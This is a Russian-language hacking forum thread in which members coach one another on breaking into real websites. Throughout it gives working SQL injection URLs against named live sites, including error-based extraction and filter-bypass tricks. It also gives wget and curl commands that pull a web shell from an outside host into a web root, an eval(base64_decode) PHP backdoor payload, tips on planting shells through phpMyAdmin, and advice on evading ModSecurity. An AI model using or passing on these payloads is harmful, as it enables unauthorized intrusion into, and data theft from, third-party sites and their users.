Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    можно ли через phpmyadmin 2.8.0.3 залить шелл не зная полного пути? с примером пожалуйста

    Объясните плиз вот это
    https://forum.antichat.ru/showpost.php?p=1323558&postcount=12
     
    #16401 noviyuser, 16 Mar 2011
    Last edited: 16 Mar 2011
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Ты же уже спрашивал!
    Если говорят люди "надо узнать полный путь", как думаешь можно!? НЕТ! Максимум, не зная пути, ты можешь залить шелл в /tmp и если есть инклюд, то проинклюдить его!

    А что тут объяснять? Это эксплоит написанный на Баше, который эксплуатируею уязвимость выполнения PHP-кода в версиях phpMyAdmin 2.11.x - 2.11.9.5; 3.x - 3.1.3.1.

    Ну и как бы там есть еще список зависимостей:
    Code:
    # attack requirements:
    # 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
    # and 3.x before 3.1.3.1 according to PMASA-2009-3
    # 2) it *seems* this vuln can only be exploited against environments
    # where the administrator has chosen to install phpMyAdmin following
    # the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
    # 3) administrator must have NOT deleted the '/config/' directory
    # within the '/phpMyAdmin/' directory. this is because this directory is
    # where '/scripts/setup.php' tries to create 'config.inc.php' which is where
    # our evil PHP code is injected 8)
     
    #16402 Tigger, 16 Mar 2011
    Last edited: 16 Mar 2011
  3. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    спс, есть таблица blabla-forum, делаю

    +from+blabla-forum.phpbb_users+--+

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.phpbb_users -- LIMIT 0, 1' at line 1

    Как обойти? он видимо думает что черта это конец запроса поэтому ошибка вылазит?
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    +from+`blabla-forum`.phpbb_users+--+
     
    1 person likes this.
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Эм.... "есть таблица blabla-forum" => "blabla-forum.phpbb_users" - это что еще за фокусы? о_0 У ТАБЛИЦЫ не может быть ТАБЛИЦЫ, таблицы находяться в DataBase'ах. И запрос имеет вид: [database].[table_name]. Узнать текущую DB можно через database(). А как узнать в какой DB находиться нужная таблица, ЧИТАЙТЕ СТАТЬИ, коих полно на античате. И сразу будет меньше вопросов и вам будет легче.
     
    2 people like this.
  6. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&type=99999+union+select+1--
    Order by определяет 1 столбик, но при попытке вывести его через union select печатает ошибку
    The used SELECT statements have a different number of columns


    похожее...
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&type=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

    http://www.cosmeticsdatabase.com/brand.php?brand_id=987+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
     
    _________________________
  8. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Ребят опять подыму вопрос свой т.к. ни одного ответа не было http://forum.antichat.ru/showpost.php?p=2594004&postcount=16594
     
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Такое происходит, потому что данный уязвимый GET-параметр участвует в нескольких запросах к разным таблицам, с разным кол-вом полей.
    Т.е. в одном запросе ты подобрал правильно кол-во колонок, в другом нет, поэтому ошибка.
    Бывают случаи, когда участвует так же несколько запросов, и ты подобрал кол-во колонок, но он вывел ошибку и при этом вывел принтабельное поле. Если же такое кол-во подобрать не удалось, то крутить как BLIND.
     
  10. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    вобщем перепробывал все, единственное отличие заливаемых файлов это Owner/Group у моих файлов site/xxx а у остальных site/yyy, но если редактировать уже имеющиеся файлы то все ок.

    вылазит все таже Premature end of script headers, как это с правами на файлы связано не ясно...

    если заливать простые файлы например .тхт то все ок, выставляешь 0755 права и они открываются (пробывал чтобы обрабатывались как php-script ошибка все также)

    что можно сделать? :(
     
  11. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    как можно обойти, делаю

    cmd=wget http://xxx.com/shell.php

    делаю

    cmd=ls >>> нормально работает
    cmd=ls -la >>> ошибка вылазит

    через GET и POST пробовал
     
    #16411 noviyuser, 17 Mar 2011
    Last edited: 17 Mar 2011
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    пробуй курлом

    curl http://site.com/shell.php > /var/www/html/shell.php
     
    _________________________
  13. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "/home/site.ru/docs/news/news/(тут все что хочу)"

    можно как-то читать файлы и т д?
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    Не выйдет ничего. Если файл, который ты хочешь прочитать некорректный xml(а он, разумеется, будет некорректным :) ), то получишь false

    http://www.spravkaweb.ru/php/datafun/xml/simplexml/simplexml_load_file
     
    #16414 попугай, 17 Mar 2011
    Last edited: 17 Mar 2011
    2 people like this.
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Была как-то такая же проблема решилась, так:
    eval(base64_decode($_POST[cmd])); =>> cmd = c3lzdGVtKCdscyAtbGEnKTs= system('ls -la');

    А ты уверен, кстати, что wget есть? Проверь так: which wget
     
    #16415 Tigger, 17 Mar 2011
    Last edited: 17 Mar 2011
  16. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ
    Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
     
    #16416 Lijzer, 18 Mar 2011
    Last edited by a moderator: 18 Mar 2011
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
     
    1 person likes this.
  18. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Судя по всему, тебя режет директива Mod Security SecRequestBodyLimit, которая проверяет, чтобы размер тела запроса не превышал указанного значения.

    http://www.ptsecurity.ru/download/modrewrite_search.zip
     
    #16418 h00lyshit!, 18 Mar 2011
    Last edited: 18 Mar 2011
    1 person likes this.
  19. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6

    спасибо а можно примерчик?
     
  20. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Не могу понять как в этом примере вывести information_schema

    http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x3a3a3a,version(),user(),database()),floor(rand(0)*2))having+min(0)--+


    и вот еще
    http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()),3,4--'
    при выводе information_schema, ошибка

    Заранее спс
     
    #16420 asql, 18 Mar 2011
    Last edited: 18 Mar 2011
Loading...
Thread Status:
Not open for further replies.